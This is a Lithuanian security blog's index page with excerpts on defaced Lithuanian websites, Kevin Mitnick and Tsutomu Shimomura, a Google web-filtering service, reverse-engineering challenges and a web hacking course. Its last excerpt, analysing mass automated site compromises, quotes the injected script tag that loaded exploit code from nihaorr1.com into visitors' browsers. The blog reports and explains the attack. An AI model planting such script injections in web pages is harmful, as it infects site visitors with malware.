Papildymas. Norėdami rasti nulaužtų tinklalapių sąrašą, skaitykit pilną įrašą.

Apie pirmąją auką jau rašiau. Dabar turim ir daugiau nulaužtų tinklalapių. Apie www.intera.lt jau parašė Karolis Pocius, o kaip atrodo www.baltijos.lt rodau dabar.

Intera.lt priklauso UAB “Interaktyvios komunikacijos”, kuri užsiima interneto tinklalapių kūrimu. Kaip patys matote - nesaugių. Tad galima daryti prielaidą, kad ir jos klientų laukia tie patys džiaugsmai. Suklydau. Prielaida ir liko prielaida. Po detalesnės analizės išaiškėjo kitos priežastys. Jos išdėstytos žemiau.

O baltijos.lt priklauso AB “Baltijos” laivų statyklai. Jiems tokias bėdas galima atleisti, svarbu jų laivai neskęstų.

Pasinaudojus vien google paieška galima rasti kelis šimtus pažeidžiamų lietuviškų tinklalapių, kurie yra sekančios potencialios aukos. Tarp jų yra tiek ir įvairių valstybinių įstaigų (ministerijos, savivaldybės), tiek ir didelių bei mažų privačių bendrovių (pradedant picerijų tinklu, avia bilietų platinimo kompanijomis, baigiant niekam nežinomom įmonėlėm).

Papildymas.

Parklupdyta jau ir Rimi. Tai vienas didžiausių prekybos centrų Lietuvoje.

Norėdami rasti nulaužtų tinklalapių sąrašą, skaitykit pilną įrašą.

Skaityti visą įrašą…

Ar girdėjot, kad Rusijos hakeriai ruošiasi pulti Lietuvą, Latviją, Estiją ir Ukrainą? Daugiau apie tai skaitykit čia: http://www.lrytas.lt/-12144139011212111835-p1-IT-Rus%C5%B3-hakeriai-planuoja-kibernetin%C4%AF-i%C5%A1puol%C4%AF-prie%C5%A1-Baltijos-%C5%A1alis-ir-Ukrain%C4%85.htm Pirmas rezultatas jau yra. Vyriausioji tarnybinės etikos komisija.

Pagal Lietuvos tinklalapių ir sistemų saugumo būklę, tai tikrai ne paskutinis. Kas kitas?

Per 1994 metų Kalėdas, Tsutomu Shimomura sulaukė skambučio iš savo kolegų, kad kažkas prisijungė prie jo naudojamos ir tam metui galingos IT sistemos bei nukopijavo didelį kiekį failų. Tsutomu tuo metu jau buvo gerai žinomas specialistas, kuris dirbo prie kompiuterinių tinklų apsaugos projektų ir konsultavo daug didelių kompanijų bei nacionalinio saugumo agentūras.

Nustatęs kas buvo nukopijuota, Tsutomu pamatė, kad buvo kopijuota ne viskas iš eilės, bet atidžiai pasirinkti tik reikiami failai. Juose buvo informacija, kuri sudomintų tik žmones, norinčius įveikti kompiuterinių ir mobiliojo ryšio tinklų saugumą. Nors oficialiai ir nebuvo įrodyta, kad šį įsilaužimą įvykdė būtent Mitnikas, tačiau nuo šio momento Šimomurai pagauti Mitniką tapo asmeniniu tikslu. Pradėjęs bendradarbiauti su FTB, jis pradėjo diegti stebėjimo priemones bei naudoti savo sukurtą programinę įrangą įsilaužimų sekimui Internete. Jo pagalba tyrėjai nustatė telekomunikacinės įrangos manipuliavimo atvejus, duomenų vagystes iš Motorola, Apple Computer bei kitų kompanijų ir 20 000 kreditinių kortelių duomenų pasisavinimą.

Skaityti visą įrašą…

Taip, tokie egzistuoja. Kokie būna hakeriai, jau rašiau anksčiau. Karai vyksta dažnai dėl požiūrių skirtumo, norint parodyti kuri grupuotė kietesnė arba toks karas tiesiog privalo būti. Visai kaip gatvėj. Policininkai prieš vagis, reperiai prieš popsą, plikai skusti prieš ilgaplaukius ir t.t. IT pasaulyje varžomasi kurie vienas kitą greičiau nulauš arba atliks daugiau defeis’ų tinklalapiams, kada policija pagaus įsilaužėlius ir pan. Visai kaip versle, tik čia skaičiuojami ne nulaužti tinklalapiai, bet užimta rinkos dalis. Ir nesvarbu ar tavo verslas legalus ar ne. Legalus verslas iš rinkos bando išstumti nelegalų. Jį išstūmęs, pradeda konkuruoti tarpusavyje ir t.t. Žodžiu, nors ir skirtingų požiūrių, bet žmonės visur vienodi ir nuolat nori su kažkuo kariauti bei varžytis. Viena tokių įdomesnių kovų IT pasaulyje turbūt vyko tarp Kevino Mitniko ir Tsutomu Shimomuros. Pirmasis buvo tas, kuris bėgo, o antrasis - kuris gaudė. Skirtingi šaltiniai skirtingai pasakoja, bet Kevinas bėgo dėl to, kad įsilaužė į Motorola, NEC, Nokia, Sun Microsystems ir Fujitsu Siemens IT sistemas. Taip pat pavogė krūvą programinių kodų, ilgai už nosies vedžiojo FTB bei nemokamai važinėjo Los Angel’o viešuoju transportu. Jam priskiriama ir daugiau visokių darbelių, kurių įrodyti teisme nepavyko.

Skaityti visą įrašą…

Šiandienos laikraščių pagrindinė tema apie asmens duomenis yra ta, kad Ūkio ministerija paviešino VP Market dešimtuko asmens duomenis. Ir pirmojo tai parašiuso blog’o, ir naujienų portalų komenataruose klausiama ir kas gi čia tokio? Kokia iš tų duomenų nauda, išskyrus tą, kad galėsi Marcinkevičių su gimtadieniu pasveikinti? O šioje nuotraukoje esantį pilietį ar pažįstat?

Skaityti visą įrašą…

Vakar Google startavo su nauja paslauga įmonėms. Paslaugos tikslas - stabdyti bet kokį žalingo kodo (virusų, šnipinėjančių programų ir t.t.) patekimą į organizacijos tinklą. Filtruojami ne adresai, bet visas interneto turinys. Prie to dar gauni ir detalią web srauto analizę, papildomą šifravimą, kai dirbi iš viešų vietų, galima valdyti interneto apribojimą visaip kaip ir t.t. Kaip kas veikia iš technologinės pusės, man šiuo metu dar neaišku, bet paslauga bet kuriuo atveju yra įdomi. Juolab, kad kompiuteryje nereikia diegti jokių programų ir jų prižiūrėti. Įrašą papildysiu, kai išsiaiškinsiu daugiau. Gal tai kiek pasirodys keista Google mylėtojams, bet paslauga yra mokama. Vienai darbo vietai kainuoja 36$ per metus. Antivirusinės sistemos licencija vieneriems metams kainuoja ~100 Lt, tad Google paslauga gaunasi daug pigesnė, o galimybių suteikia daug daugiau. Taip pat nereikia nieko prižiūrėti ir atnaujinti, visu tuo jau pasirūpinta. Ir visiškai nesvarbu ar darbuotojas dirba iš ofiso, namų, viešbučio ar kur kitur. Daug svarbios ir slaptos informacijos valdančioms organizacijoms, tai turbūt nebūtų priimtina paslauga (kuri iš jų svarbią info siunčiasi iš interneto nešifruotą, a?), bet eiliniams Lietuvos prekybininkams su krūvom vadybininkų - pats tas. Tai yra ne pirmas Google saugumo produktas. Apie šį daugiau info rasite čia (ir apie kitus ten pat): http://www.google.com/a/help/intl/en/security/web.html. Pasirodo, saugumo produktai su palaikymu gali kainuoti ir nedaug, kai į tą rinką pradeda lįsti Google. :).

Eilinį kartą kelias dienas galvojau parašyti viena tema, bet kažkaip spontaniškai vėl gavosi kita tema. Vienam komentare po įrašu perskaičiau, kad kažkas bando įveikti www.try2hack.lt užduotis. Atleiskit, bet primityvesnių užduočių matyti dar neteko. Na gerai, visiškai žaliam pradedančiajam gal ir tinka, bet norintiems jėgas išbandyti rimčiau, siūlau pabandyti šiais adresais esančias užduotis. Įvardinsiu tik keletą iš jų ir nebūtinai naujausių. Senai jau žinios neatnaujintos šioje srityje.

http://crackmes.de/ - vieta besidomintiems reverse engineering‘u. Šiame puslapyje nuolat pasirodo nedidelių programėlių, kuriose realizuotos įvairaus sudėtingumo programų apsaugos funkcijos. Prie jų būna ir taisyklės kokiais metodais tą apsaugą galima nulaužti, o kokiais ne. Kai kas nors apsaugą įveikia, tuomet įdeda aprašymą kaip tai padarė. Puiki vieta žinių tobulinimui, norintiems sustiprinti savo programų apsaugą.

Skaityti visą įrašą…

Gavau tik ką į paštą štai tokį laišką.

Si eilerasti parase veziu serganti paaugle. Ji noretu suzinoti, kiek zmoniu gavo jos eilerasti. Tai tikrai yra eilerastis.
Prasome perduoti ji kitiems. Ji issiunte jos gydytojas – butinai perskaitykite, kas parasyta baigiamajame zodyje po eilerasciu.

Lėtas šokis

Ar kada nors stebejote vaikus,
Skriejancius ratu?
Ar klausetes,
kaip lietus
Tyska i zeme?
Ar kada nors grozejotes drugelio sokiu?

<…praleista daug daug teksto…>

Skaityti visą įrašą…

Šiemet organizuoju “WEB HACKING: įveikti internetą” mokymus. Kursui tuoj bus vieneri metai, bet visą tą laiką jis sėkmingai atnaujinamas. Savaitgalį į jį sudėjau ir paskutinio masinio nulaužimo analizę. Įdomiai ta visa ataka padaryta. Pirmą kartą mokymai truko 2 dienas, po to 3, dabar jau neaišku ar į 3 normaliai tilpti pavyks. Bet gal apie viską nuo pradžių.

Skaityti visą įrašą…

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Skaityti visą įrašą…